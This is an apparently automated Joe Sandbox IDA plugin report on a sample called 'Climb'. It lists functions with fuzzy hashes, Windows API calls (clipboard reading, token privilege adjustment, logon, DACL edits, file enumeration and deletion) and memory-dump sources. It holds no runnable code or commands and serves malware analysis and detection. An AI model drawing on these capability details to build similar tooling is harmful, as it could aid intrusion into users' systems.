Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: c5f3e2371a10f9d8d5f293e6384c5e03478114224bfa64faca61733c2616cd95
Instruction ID: 38c0e8c08711fc33d656963e6893528507d27156953d35f4db0ef2074bfb6bb2
Opcode Fuzzy Hash: c5f3e2371a10f9d8d5f293e6384c5e03478114224bfa64faca61733c2616cd95
Instruction Fuzzy Hash: 65112A76A0410AAFCF05DF98E945DDE7BF8EF49310F114069F809AB311DA31EA11CB65

Function 00A8E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction ID: 3e15e37893e388c1e9d3cf1e57519c63a27d5d4012cf927cac1fca9d32243c6b
Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction Fuzzy Hash: 72F0A432601620DADA317A7ADD05B6A7BD89F42334F100726F525D71D1EAB4E80287D2

Function 00ADF94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00ADF987

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: 6d1995e716386309a7ba6213fb29b1fadfff85563c54a28e78276f50a3209cf9
Instruction ID: a383fe5055f00ef58adaecf99bc4db98b1f7845852cf7c665b9371ae06128004
Opcode Fuzzy Hash: 6d1995e716386309a7ba6213fb29b1fadfff85563c54a28e78276f50a3209cf9
Instruction Fuzzy Hash: B7F03C72A00204BFCB01EBA5DD4AD9FBBB9EF49720F004055F5059B361DA74EA45C761

Function 00A93B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00A86A79,?,0000015D,?,?,?,?,00A885B0,000000FF,00000000,?,?), ref: 00A93BC5

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 26980c538341caa6f36ce613e7739757291ec73ff126a30a25682dccaa49c208
Instruction ID: 3511df78beb22183db69fae760dbc7f4a5ddc39e1f54086dcc1d0dc5456231d7
Opcode Fuzzy Hash: 26980c538341caa6f36ce613e7739757291ec73ff126a30a25682dccaa49c208
Instruction Fuzzy Hash: 5DE06D73740621AADF2137B69C01B9A3AF8AF413A0F150261FC69EA591EF70DE4086A4

Function 00A666E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b079350db15501515ba5a3d7cd87966b7f3f1217d9f41fabf0dc0dc5532e14b
Instruction ID: 6405ed0199b6f7398949a2d0fd2cd107aba66b1b12dd3668fd5bda22e02c38b7
Opcode Fuzzy Hash: 3b079350db15501515ba5a3d7cd87966b7f3f1217d9f41fabf0dc0dc5532e14b
Instruction Fuzzy Hash: C1F039B1505702CFCB349FA4D8A0826BBF5BF143293248A3EE2E687610C7729880DF14

Function 00AB6AD5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00AB6AE0

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 3423bd93b678fa79b22035e0dc360caa15dd7542121716c1ad23a4f6e985a4c2
Instruction ID: 025bf863ae9b406d6f7ba4be6801b888899a62e9db3d75156657bdc3dfe9973d
Opcode Fuzzy Hash: 3423bd93b678fa79b22035e0dc360caa15dd7542121716c1ad23a4f6e985a4c2
Instruction Fuzzy Hash: 24F0EDB1704600AAEB209BA89C09BF1FBFCAB00315F14C61ED5D9C2182D7BA4494A7A2

Function 00A6684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00A66868

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction ID: e95bd1eefff29369d542d247f1ef23fc21238251d389d450c86306ac418d4b27
Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction Fuzzy Hash: 01F0F87590020DFFDF05DF90C941EAEBB79FF04318F208445F9159A151C336EA21ABA1

Function 00A63907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 00A63963

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: cb710e19309c7fc0f2a5edc7b66ab13c2b1e4d604125ac12ae98ef09c0a6a1ec
Instruction ID: 1e7809ee77b136116c0c26980f459046b923539352d66f9d4efb21f778a41fb7
Opcode Fuzzy Hash: cb710e19309c7fc0f2a5edc7b66ab13c2b1e4d604125ac12ae98ef09c0a6a1ec
Instruction Fuzzy Hash: AFF037719143149FEB52DF64EC457997BFCA70170CF1000A5A644A7181DB745789CF55

Function 00A63A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00A63A76

Part of subcall function 00A68577: _wcslen.LIBCMT ref: 00A6858A

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: cbade96dd659009ef42bd475b69e432b33a8c310a516cd2129f365d472e19b70
Instruction ID: becaa9ff7621bd104e550d9a2e76ac2a14890a7ff404a9b3c10550ee92e7aa30
Opcode Fuzzy Hash: cbade96dd659009ef42bd475b69e432b33a8c310a516cd2129f365d472e19b70
Instruction Fuzzy Hash: E0E0C272A002245BCB21E29C9C0AFEE77EDDFC87A0F0441B1FC09D7258EA64ED80C690

Function 00AA071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00AA0A84,?,?,00000000,?,00AA0A84,00000000,0000000C), ref: 00AA0737

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 62178bef9a583fc086bf57db4b1a6d42f5e35ba17bb8734352d97e1586173bd3
Instruction ID: f8107b9d1fe48319820b6b6c5aeae1511dc9afa37ae1c0d5cdadb26f8b0301f3
Opcode Fuzzy Hash: 62178bef9a583fc086bf57db4b1a6d42f5e35ba17bb8734352d97e1586173bd3
Instruction Fuzzy Hash: F0D06C3200010DBBDF028F84DD06EDA3BAAFB48714F014100BE1856020C732E832EB94

Function 00ACEAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00ACD840), ref: 00ACEAB1

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 60c69f5043233c60854a7c87f0b1db7c7f7e14a2bf467ee32ad98d43630816c7
Instruction ID: cdddd613b2c6b73a09dcdbce70ed3db3e815235e3538b1526f088dee76511577
Opcode Fuzzy Hash: 60c69f5043233c60854a7c87f0b1db7c7f7e14a2bf467ee32ad98d43630816c7
Instruction Fuzzy Hash: 9DB0923400060009AD288B785A0DEA9330178423E67DE1BC8E479850E1D33A880FE990

Function 00AD664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00ACDC54: FindFirstFileW.KERNEL32(?,?), ref: 00ACDCCB
Part of subcall function 00ACDC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00ACDD1B
Part of subcall function 00ACDC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00ACDD2C
Part of subcall function 00ACDC54: FindClose.KERNEL32(00000000), ref: 00ACDD43

GetLastError.KERNEL32 ref: 00AD666E

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 3c9527bff52aa211fec0e596c0274e573fef4ea0e9603325a3562b19bd581c3d
Instruction ID: 5c88ca197cd8be2908a766f4dce56bba49eea5a5f17fd6a52c379c2189c7b099
Opcode Fuzzy Hash: 3c9527bff52aa211fec0e596c0274e573fef4ea0e9603325a3562b19bd581c3d
Instruction Fuzzy Hash: 3BF08C362002008FCB14EF58D955B6EB7E9AF88320F048419F90A8B352CB74FC01DB90

Non-executed Functions

Function 00AC1B4D Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00AC2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AC205A
Part of subcall function 00AC2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AC2087
Part of subcall function 00AC2010: GetLastError.KERNEL32 ref: 00AC2097

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00AC1BD2
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00AC1BF4
CloseHandle.KERNEL32(?), ref: 00AC1C05
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00AC1C1D
GetProcessWindowStation.USER32 ref: 00AC1C36
SetProcessWindowStation.USER32(00000000), ref: 00AC1C40
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00AC1C5C

Part of subcall function 00AC1A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AC1B48), ref: 00AC1A20
Part of subcall function 00AC1A0B: CloseHandle.KERNEL32(?,?,00AC1B48), ref: 00AC1A35

Strings

, xrefs: 00AC1BA6
default, xrefs: 00AC1C57
winsta0, xrefs: 00AC1C18

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: cfa42e163a0943a18cd67adbb14767df385b88e4cd9337998caf60afd91712da
Instruction ID: 45175cba28cdc14d78a8a5840f7e95f6425169881f32bf00fd30974a7eb84afb
Opcode Fuzzy Hash: cfa42e163a0943a18cd67adbb14767df385b88e4cd9337998caf60afd91712da
Instruction Fuzzy Hash: 56817871A00209ABDF12DFE4DD49FFE7BB9EF09300F154129F916A61A1EB718946CB60

Function 00AC14AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AC1A60
Part of subcall function 00AC1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00AC14E7,?,?,?), ref: 00AC1A6C
Part of subcall function 00AC1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00AC14E7,?,?,?), ref: 00AC1A7B
Part of subcall function 00AC1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00AC14E7,?,?,?), ref: 00AC1A82
Part of subcall function 00AC1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AC1A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AC1518
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AC154C
GetLengthSid.ADVAPI32(?), ref: 00AC1563
GetAce.ADVAPI32(?,00000000,?), ref: 00AC159D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AC15B9
GetLengthSid.ADVAPI32(?), ref: 00AC15D0
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00AC15D8
HeapAlloc.KERNEL32(00000000), ref: 00AC15DF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AC1600
CopySid.ADVAPI32(00000000), ref: 00AC1607
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AC1636
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AC1658
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AC166A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AC1691
HeapFree.KERNEL32(00000000), ref: 00AC1698
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AC16A1
HeapFree.KERNEL32(00000000), ref: 00AC16A8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AC16B1
HeapFree.KERNEL32(00000000), ref: 00AC16B8
GetProcessHeap.KERNEL32(00000000,?), ref: 00AC16C4
HeapFree.KERNEL32(00000000), ref: 00AC16CB

Part of subcall function 00AC1ADF: GetProcessHeap.KERNEL32(00000008,00AC14FD,?,00000000,?,00AC14FD,?), ref: 00AC1AED
Part of subcall function 00AC1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00AC14FD,?), ref: 00AC1AF4
Part of subcall function 00AC1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00AC14FD,?), ref: 00AC1B03

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 319544f34afece2e089e45928dc903f478b2c6ac4c4400303022fca597e540fe
Instruction ID: abbcf63474107b0f5d2ae4a72cee3d4938d17290b6705520dc8b5554e1babe95
Opcode Fuzzy Hash: 319544f34afece2e089e45928dc903f478b2c6ac4c4400303022fca597e540fe
Instruction Fuzzy Hash: C6715CB2A00209ABDF11DFE5DC48FAEBBB9FF05340F194519E915E7291DB319906CBA0

Function 00ADF55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00AFDCD0), ref: 00ADF586
IsClipboardFormatAvailable.USER32(0000000D), ref: 00ADF594
GetClipboardData.USER32(0000000D), ref: 00ADF5A0
CloseClipboard.USER32 ref: 00ADF5AC
GlobalLock.KERNEL32(00000000), ref: 00ADF5E4
CloseClipboard.USER32 ref: 00ADF5EE
GlobalUnlock.KERNEL32(00000000), ref: 00ADF619
IsClipboardFormatAvailable.USER32(00000001), ref: 00ADF626
GetClipboardData.USER32(00000001), ref: 00ADF62E
GlobalLock.KERNEL32(00000000), ref: 00ADF63F
GlobalUnlock.KERNEL32(00000000), ref: 00ADF67F
IsClipboardFormatAvailable.USER32(0000000F), ref: 00ADF695
GetClipboardData.USER32(0000000F), ref: 00ADF6A1
GlobalLock.KERNEL32(00000000), ref: 00ADF6B2
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00ADF6D4
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00ADF6F1
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00ADF72F
GlobalUnlock.KERNEL32(00000000), ref: 00ADF750
CountClipboardFormats.USER32 ref: 00ADF771
CloseClipboard.USER32 ref: 00ADF7B6

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 38185d1c2649c6b69b052b52ffea095137ce2961c90958047e58701c053aa912
Instruction ID: b559aaa898d7c517f25f58a76e1716896571f484324c6cfd053b6266e9608833
Opcode Fuzzy Hash: 38185d1c2649c6b69b052b52ffea095137ce2961c90958047e58701c053aa912
Instruction Fuzzy Hash: 7F617F352042419FD301EF64D889F6BB7B5AF84708F14456AF457C73A2DB31E946CB61

Function 00AD73D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00AD7403
FindClose.KERNEL32(00000000), ref: 00AD7457
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AD7493
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AD74BA

Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333

FileTimeToSystemTime.KERNEL32(?,?), ref: 00AD74F7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00AD7524

Strings

%4d%02d%02d%02d%02d%02d%03d, xrefs: 00AD7577
%4d%02d%02d%02d%02d%02d, xrefs: 00AD75AF
%02d, xrefs: 00AD7645, 00AD764F, 00AD769F, 00AD76EF, 00AD773F, 00AD778F
%03d, xrefs: 00AD77E7
%4d, xrefs: 00AD75F6

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 98dd6f7d8150c132e8a1100845034b0b83e014bd56e95420aac0ea1813073aad
Instruction ID: 4a3a731ba2273f3827241514f44a9b86fe94d6fa33710c52d542f3e0e0d91276
Opcode Fuzzy Hash: 98dd6f7d8150c132e8a1100845034b0b83e014bd56e95420aac0ea1813073aad
Instruction Fuzzy Hash: 98D15D72508304AEC304EBA4C995EAFB7FCAF88704F40491AF599D7292EB74DA44C762

Function 00ADA087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76E18FB0,?,00000000), ref: 00ADA0A8
GetFileAttributesW.KERNEL32(?), ref: 00ADA0E6
SetFileAttributesW.KERNEL32(?,?), ref: 00ADA100
FindNextFileW.KERNEL32(00000000,?), ref: 00ADA118
FindClose.KERNEL32(00000000), ref: 00ADA123
FindFirstFileW.KERNEL32(*.*,?), ref: 00ADA13F
SetCurrentDirectoryW.KERNEL32(?), ref: 00ADA18F
SetCurrentDirectoryW.KERNEL32(00B27B94), ref: 00ADA1AD
FindNextFileW.KERNEL32(00000000,00000010), ref: 00ADA1B7
FindClose.KERNEL32(00000000), ref: 00ADA1C4
FindClose.KERNEL32(00000000), ref: 00ADA1D4

Strings

*.*, xrefs: 00ADA13A

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
